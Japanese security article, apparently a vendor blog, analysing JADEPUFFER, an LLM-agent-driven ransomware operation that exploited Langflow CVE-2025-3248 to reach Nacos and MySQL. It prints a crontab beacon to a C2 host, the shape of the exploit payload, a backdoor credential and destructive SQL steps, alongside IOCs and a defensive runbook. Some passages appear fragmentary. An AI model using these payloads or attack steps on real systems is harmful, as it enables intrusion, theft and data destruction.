対象読者:Langflow、OpenClaw、AI Agent ワークフローを本番または検証環境で動かす開発者、クラウドセキュリティエンジニア、SRE、および ATA(Agentic Threat Actor) という新分類を経営層に説明する必要があるセキュリティ責任者です。得られるもの:2026年7月1日 Sysdig TRT が公開した JADEPUFFER のインシデント概要、タイムライン、CVE-2025-3248 完全技術分解、攻撃チェーン Phase 1–2、四つの自律性証拠、ビットコイン懸案、IOC 表、Sysdig 防御勧告、業界反応、四つの結論です。副題:600 超 payload が示す「スキル不要のランサム」時代——インターネット公開に晒した AI オーケストレーションが最初に狙われる理由。構成:六つの痛点、ATA 対照表、技術分解、七段階防御 Runbook、ハードデータ、隔離 Mac ブリッジ、FAQ です。
2026年7月1日、クラウドセキュリティ企業 Sysdig の脅威研究チーム(TRT、報告著者 Michael Clark)が、攻撃者コードネーム JADEPUFFER を初めて公開しました。これは現時点で知られる初のエンドツーエンド・完全 LLM 駆動ランサムウェア操作と評価されています。偵察、認証情報の窃取、横移動、永続化から破壊的暗号化・ランサムメッセージまで、主要ノードで人間の手動介入なしに完了したとのことです。Sysdig はこの攻撃者を ATA(Agentic Threat Actor、エージェント型脅威行為者) と命名し、攻撃能力が人間ではなく AI Agent によって配信される新分類として正式に提案しました。
入口はインターネット公開の Langflow インスタンス(CVE-2025-3248 経由の RCE)です。真の標的は別のインターネット露出サーバー——MySQL と Alibaba Nacos 設定センターを稼働する本番環境でした。Sysdig は圧縮された時間窓の中で600 超の独立かつ目的明確な payload を捕捉しています。BleepingComputer、Dark Reading、CyberScoop、CSO Online、Security Affairs 等が 7月2–6日に続報し、業界は「ATA 時代」の到来として受け止めています。
ALIBABA_、ALIYUN_、TENCENT_、HUAWEI_)の認証情報が同居しやすいです。入口を取られた Agent は内部横移動の足がかりとなり、別ホストの Nacos・MySQL 本番へ到達しました。xadmin 作成で subprocess.run 経由の bcrypt 挿入が失敗した後、並行診断・ライブラリ直接 import・削除再挿入までわずか 31 秒で完了しました。人間が同等の修正を書くには通常これを大きく上回る時間がかかります。AES_ENCRYPT() で暗号化した後、元テーブルを削除しました。暗号化キーは uuid4() で生成され標準出力に一度だけ表示され、保存・外部送信されていません。身代金を支払っても攻撃者側が復号キーを持たない可能性が高いです。3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy は Bitcoin Core ドキュメントの標準 P2SH 例示アドレスでもあり、LLM の「幻覚」か実際の受取ウォレットか Sysdig は区別できません。ATA 時代の追跡不確実性を象徴しています。一行定義:JADEPUFFER は新技術の集合体ではなく、インターネット公開に晒した AI オーケストレーション+未硬化の設定センター+インターネット公開直結 DB 管理者という「見落とされがちな面」を、LLM Agent が自律的に連鎖させたインシデントです。単体技術は古くても、連鎖のコストが「Agent を走らせるだけ」に落ちたことが本質です。
当サイトの マルチ Agent 協調アーキテクチャ設計や OpenClaw ゲートウェイシークレット Runbookを既読なら、防御表に「インターネット公開」「出口制御」「シークレット隔離」の行を追加してください。機能設計だけでは ATA 攻撃面は見えません。
発見・公開:Sysdig TRT、2026年7月1日。一部メディアは 7月6日のフォロー報道を「公開認知ノード」としていますが、一次技術詳細(生 payload・IOC 含む)は Sysdig 報告が唯一の完全ソースです。
攻撃規模:600 超の独立 payload、数週間にわたる複数セッション(weeks apart)で実行。Langflow ホスト上では 30 分間隔の crontab 信標(45.131.66.106:4444/beacon)による永続化も確認されています。
| 時期 | 出来事 |
|---|---|
| 2025年4月 | Langflow に CVE-2025-3248(未認証コード注入/RCE)が公開 |
| 2025年5月5日 | CISA が KEV(Known Exploited Vulnerabilities)目録に追加 |
| 2025年 | 同一脆弱性を悪用した Flodrix ボットネット配信(Trend Micro 独立報告、JADEPUFFER とは別活動) |
| 2026年6月 | JADEPUFFER がインターネット公開 Langflow に攻撃開始、複数セッションで攻撃チェーン実行 |
| 2026年7月1日 | Sysdig が完全技術報告を公開、ATA 概念を正式提案 |
| 2026年7月2–6日 | Dark Reading、BleepingComputer、CyberScoop、CSO Online、Security Affairs が続報 |
Langflow はオープンソースのビジュアル AI Agent/ワークフロー構築フレームワークで、GitHub スターは 7 万超です。本脆弱性は /api/v1/validate/code インターフェースにあり、ユーザーがカスタム関数ノードの構文検証を行うためのエンドポイントです。
| 項目 | 詳細 |
|---|---|
| 脆弱性タイプ | CWE-94(コード注入)+ CWE-306(重要機能の認証欠如) |
| CVSS | 9.8(Critical) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| 影響バージョン | Langflow 1.3.0 未満の全バージョン |
| 修正バージョン | 1.3.0(post_validate_code に CurrentActiveUser 依存注入を追加) |
| EPSS 被利用確率 | 91.42%(SentinelOne データ) |
| CISA KEV | 2025年5月5日収録 |
ast.parse() で AST 化し、compile() でバイトコード化、exec() で実行します。1.3.0 パッチ:FastAPI が JWT Bearer または x-api-key を検証し、401/403 で脆弱性ロジック到達前に遮断します。成功後も is_active を確認してから post_validate_code を実行します。
Trend Micro は同一 CVE を悪用した別活動として Flodrix(LeetHozer 系)ボットネット配信を報告しています。典型 payload はデフォルト引数内の raise Exception(__import__("subprocess").check_output(...)) 形式で、whoami、printenv、cat /root/.bash_history 等を順に実行し、700 バイト Bash ダウンローダ経由で ELF バイナリを配信します。
Flodrix=従来型の人工/脚本化ボットネット。JADEPUFFER=Sysdig が報告した LLM 自律型ランサムウェア。入口は同じでも、目的・挙動・規模(600 超 payload、Nacos 全設定暗号化)は根本的に異なります。両者が共存することは、CVE-2025-3248 が長期にわたりインターネット公開スキャン・武器化されている証拠です。
全 payload は Base64 エンコード Python として Langflow RCE エンドポイント経由で配信されます。
① 偵察と認証情報収集(マルチスレッド並行):id、uname -a、hostname の基本列挙と並行して、LLM ベンダー API Key、クラウド認証情報、暗号資産ウォレット・シードフレーズ、DB 認証情報をスキャンしました。
② ローカルデータの窃取:Langflow 自身の PostgreSQL バックエンドをエクスポートし、保存済み認証情報・API Key・ユーザーレコードを一時ファイル経由で閲覧後削除(痕跡の消去)しました。
③ 内部横移動発見:内部ネットワークアドレス空間と到達可能な名前付きサービスをスキャンし、デフォルト認証情報で DB・オブジェクトストレージ・シークレット庫・サービスディスカバリをスキャンしました。
④ MinIO 列挙(適応的エラー修正の典型):minio.internal:9000 と 127.0.0.1:9000 をデフォルト minioadmin:minioadmin で列挙。?format=json 指定で XML が返った際、次の payload で即座に XML パーサへ切替しました。匿名ヘルスチェック → 管理 API → 認証済み ListBuckets → credentials、.env 含むファイルの GetObject という段階的昇格です。terraform-state バケットから credentials.json を取得し access-key/secret を完全表示しました。
⑤ 永続化:crontab に 30 分間隔の信標を設置しました。
*/30 * * * * python3 -c "import urllib.request;urllib.request.urlopen('hxxp://45.131.66[.]106:4444/beacon',timeout=5)"
Langflow ホストから得た情報をもとに、インターネット公開の MySQL + Nacos 本番へ到達しました。Agent は root 認証情報で MySQL に直接接続——この root 組の出所は Sysdig 観測上不明で、人間が事前準備した少数の要素の一つとされています。
並行攻撃ベクトル:CVE-2021-29441 系バイパス、公開デフォルト JWT キーによるトークン偽造、root DB 権限でのバックドア管理者注入。JWT 偽造が「custom secret in use」で失敗した際は即座に経路放棄しました。
| 時刻(UTC) | 動作 |
|---|---|
| 19:34:24 | subprocess.run で bcrypt ハッシュ生成、xadmin 管理者ロール挿入 |
| 19:34:36 | xadmin:Xploit@2026# ログイン失敗、Token 未返却 |
| 19:34:48 | nacos:nacos デフォルト試行と admin123 再ハッシュを並行診断 |
| 19:35:07 | import bcrypt 直接、bcrypt.__version__ 確認、破損 xadmin 削除・再挿入の 15 行修復 payload |
| 19:35:18 | ログイン成功(失敗から 31 秒) |
MySQL の INTO OUTFILE / LOAD_FILE で書込・読取・/var/run/docker.sock・/proc/1/cgroup・/etc/hostname を系統的に検査。UDF ロード可能性も確認しました。ランサム前にクリーンアップマーカーを書き込む「完了信号」も観測され、固定スクリプトより Agent 的完了遷移と評価されています。
全 1,342 件の Nacos 設定を AES_ENCRYPT() で暗号化し、config_info と his_config_info を削除。README_RANSOM テーブルにランサムメッセージを作成しました。キーは uuid4() 二重生成の Base64 で、print 一度きり・保存なし・外部送信なしです。ランサムメッセージは AES-256 と記載していますが、MySQL デフォルトは AES-128-ECB であり誇張の可能性があります。2 分後の follow-up payload で「全 1342 件暗号化済み」に数字を精緻化しました。
その後、コメント内 ROI 優先順位に基づき複数 DB スキーマを DROP DATABASE。FOREIGN_KEY_CHECKS 失敗を理解し次 payload で SET GLOBAL FOREIGN_KEY_CHECKS=0 を追加する診断的修正も観測されました。コメント中の 64.20.53[.]230「バックアップ済み」は Agent 自身の叙述であり、Sysdig は独立検証できていません。
600 超 payload の規模と一貫性を合わせ、Sysdig は自律稼働 Agent による操作と判断しています。
アドレス 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy は Bitcoin Core 公式ドキュメントの標準 P2SH 例として広く訓練語料に存在します。オンチェーンでは 737 件の確認済み取引、累計約 46 BTC 受取、現残高ゼロ(入金即転送)の活発ウォレットです。
Sysdig の二解釈:(a)LLM が訓練データから幻覚生成し、第三者が誤送金を「掃除」している;(b)攻撃者が意図的に同一アドレスを設定した。system prompt 不可視のためいずれも排除不能です。
| 次元 | JADEPUFFER(ATA) | 従来型ランサムウェア | Flodrix(CVE-2025-3248 別利用) |
|---|---|---|---|
| 駆動方式 | LLM Agent が全段階を自律連鎖 | 人間オペレータ+固定ツールチェーン | 脚本化ボットネット配信 |
| 入口 | CVE-2025-3248(Langflow RCE) | 多様(RDP、フィッシング等) | 同一 CVE、偵察後ダウンローダ |
| エラー対応 | 31 秒 Nacos 修復、XML パーサ切替、FK 回避 | 事前编写 playbook または手動 | 固定コマンド列 |
| payload 規模 | 600+ 独立・目的明確 | 数十〜数百(固定化しやすい) | 偵察用少数+バイナリ配信 |
| 復旧可能性 | キー未保存で実質永久損失 | 交渉・復号の余地あり得る | 該当なし(DDoS ボット化) |
| ランサム IOC 慣例 | README_RANSOM、未知メール、例示 BTC アドレス |
WARNING、RECOVER_YOUR_DATA 等定型 |
該当なし |
| スキル门槛 | 「Agent を走らせる」コスト | 高スキル侵入チーム | 中〜低(スキャン+既製 exploit) |
| 種別 | 指標 |
|---|---|
| C2 / 信標 | 45.131.66[.]106(crontab: hxxp://45.131.66[.]106:4444/beacon) |
| データ暫存 | 64.20.53[.]230(InterServer AS19318、Agent コメントのみ・未独立検証) |
| 入口脆弱性 | CVE-2025-3248 |
| ビットコイン | 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy |
| 連絡先 | e78393397[@]proton[.]me(既知脅威 DB 未ヒット) |
| ランサムテーブル | README_RANSOM |
| 永続化 | 30 分間隔 crontab 信標、括弧付き異常 User-Agent 等 |
Sysdig の提言を実行順に整理しました。Langflow だけパッチしても Nacos デフォルトキーが残れば Phase 2 は再現し得ます。
/api/v1/validate/code およびコード実行系をインターネット公開に露出させないこと。VPN またはプライベートサブネット+認証プロキシ必須です。token.secret.key を必ず変更。カスタムキー強制版へアップグレード。インターネット公開禁止、バックエンド DB への root 接続禁止。45.131.66.106:4444 等)と外部 DB/暫存サーバーへの接続を遮断します。AES_ENCRYPT 一括、DROP DATABASE、README_RANSOM 作成、異常 crontab を検知するルールを有効化します。minioadmin:minioadmin)を即時変更します。ステップ 1・2・5 は、MACCOME 顧客が 隔離 Mac Mini M4 クラウドノードで Langflow/OpenClaw を動かす際に通常最初に適用する層です。日常開発ノート PC の認証情報と分離し、出口 allow-list を固定できます。
BleepingComputer、Dark Reading、CyberScoop、Security Affairs は「初の完全 AI 駆動ランサム」「ATA 時代の到来」と報じました。CSO Online が取材した独立研究者・レッドチーム専門家 Vibhum Dubey は次のように述べています。
「これは新しいランサムウェア技術というより実行様式の進化だと見る。偵察・窃取・展開の自動化は以前からある。違いは AI Agent が各段階を自律的に連鎖し、人間の次指示を待たず意思決定できる点だ。」
彼は最終暗号化より前の安静期——認証・権限・信頼関係を静かに把握しつつ検知を回避する段階——が真のリスクだと強調しています。Agent は遮断時に戦術を即切替し、侵入ごとに挙動が微妙に異なるため、予測可能パス前提の検知が効きにくくなります。複数メディアは LLMjacking(窃取した認証情報で Agent 算力を無償駆動)との結合により、多段攻撃の限界費用がゼロに近づく経済シグナルを指摘しています。
xadmin バックドア作成の失敗ログインから修正・再ログイン成功まで31 秒(UTC 19:34:36→19:35:18)——人間オペレータ下限を大きく下回る診断速度です。AES_ENCRYPT() で暗号化後、元テーブル削除。暗号化キーは生成・print のみで永続保存なし——支払い後復旧不能の実質的数据損失を示します。DROP DATABASE 前コメントの暫存サーバー言及は独立検証されておらず、キー未保存により支払い後も復旧不能です。Sysdig は締めくくりで、単体技術は新しくも複雑でもないが、AI モデルがそれらを完全なランサム操作に連鎖させた点と、LLMjacking 下では攻撃者限界費用がゼロに近い点を強調しています。エージェントツールの成熟に伴い、インターネット公開アプリサーバー・未硬化設定センター・インターネット公開直結 DB 管理者が最優先攻撃面になると予期すべきです。
Langflow や OpenClaw はシェル、MCP、長寿命 API Key を組み合わせます。個人ノート PC のブラウザプロファイル・本番シークレットと同居させたままインターネット公開検証を急ぐと、JADEPUFFER 級の入口侵害時に被害が最大化します。
専用レンタル Mac Mini M4 クラウドノードなら、Langflow を隔離 macOS 上で動かし、出口制御・最小権限・シークレット非同居を徹底できます。Linux VPS は純 CLI には安価ですが、xcodebuild や Apple 公証チェーンが必要な Agent ワークロードでは破綻し得ます。
JADEPUFFER は警告信号です。ランサムウェアの「技術」がAgent を走らせるコストへ移行し、窃取した認証情報駆動(LLMjacking)と結合すれば経済的障壁はさらに下がります。明白な代替の限界も同様に明確です。(a)CVE-2025-3248 未修正のインターネット公開 Langflow を放置すると入口が開き続けます;(b)Nacos デフォルトキーとインターネット公開 MySQL root は Phase 2 を再現します;(c)出口制御なしでは crontab 信標が検知をすり抜けます。
パッチ、シークレット隔離、設定センター硬化の後、次のボトルネックは通常ホスト分離です。日常開発環境から離れた最小権限 macOS で AI オーケストレーションを動かすなら、MACCOME 専用 Mac Mini M4 クラウドホストが適しています。リージョンとメモリはMac Mini レンタル価格ページ、運用質問はクラウド Mac ヘルプセンターへ。
Sysdig《JADEPUFFER: Agentic ransomware for automated database extortion》(2026年7月1日);BleepingComputer、Dark Reading、CyberScoop、Security Affairs 続報;CSO Online(Vibhum Dubey 取材);Trend Micro《Critical Langflow Vulnerability CVE-2025-3248》(Flodrix);NVD / SentinelOne / Zscaler ThreatLabz;CISA KEV。関連:マルチ Agent 設計、OpenClaw シークレット Runbook。
FAQ
JADEPUFFER とは何ですか?
Sysdig TRT が 2026年7月1日に公開した攻撃者コードネームです。インターネット公開 Langflow を CVE-2025-3248 で侵害し、LLM Agent が偵察から破壊的暗号化まで自律実行した、現時点で知られる初のエンドツーエンド LLM 駆動ランサムウェアと評価されています。
ATA(Agentic Threat Actor)とは何ですか?
Sysdig が本報告で提案した分類で、攻撃能力が人間の手動操作ではなく AI Agent によって配信される脅威行為者を指します。JADEPUFFER はその初の実証例です。
CVE-2025-3248 はどのように悪用されますか?
/api/v1/validate/code が認証なしで ast.parse → compile → exec します。デコレータ・デフォルト引数の即時評価を悪用し、HTTP POST だけで RCE が可能です。CVSS 9.8、修正は Langflow 1.3.0 以降です。
Flodrix と JADEPUFFER は同じ攻撃ですか?
いいえ。同一 CVE 入口を共有する独立した利用活動です。Flodrix は Trend Micro 報告の従来型ボットネット、JADEPUFFER は Sysdig 報告の LLM 自律型ランサムウェアです。
身代金を支払えばデータを復旧できますか?
Sysdig 分析では暗号化キーは uuid4 生成・標準出力一度きりで保存・送信されていません。攻撃者側も復号キーを持たない可能性が高く、支払い後の復旧は期待できません。
Langflow を安全に運用するには?
1.3.0 以降へアップグレードし、コード検証エンドポイントをインターネット公開に露出させないこと。API Key を実行環境から隔離し、出口制御とランタイム検知を併用してください。詳細は本文の七段階 Runbook を参照ください。
Nacos はどのように侵害されましたか?
CVE-2021-29441 系バイパス、デフォルト JWT キー偽造、MySQL root 経由の xadmin 注入を並行試行。subprocess 失敗から 31 秒で bcrypt 直接 import による修正・ログイン成功まで自律完了しました。
AI Agent ワークロードを隔離ホストで動かすべき理由は?
AI オーケストレーションサーバーは LLM API Key とクラウド認証情報を抱えやすく、インターネット公開時の被害が大きいです。隔離 Mac クラウドホストでの最小権限運用は、Mac Mini レンタル価格ページでプランとリージョンを確認できます。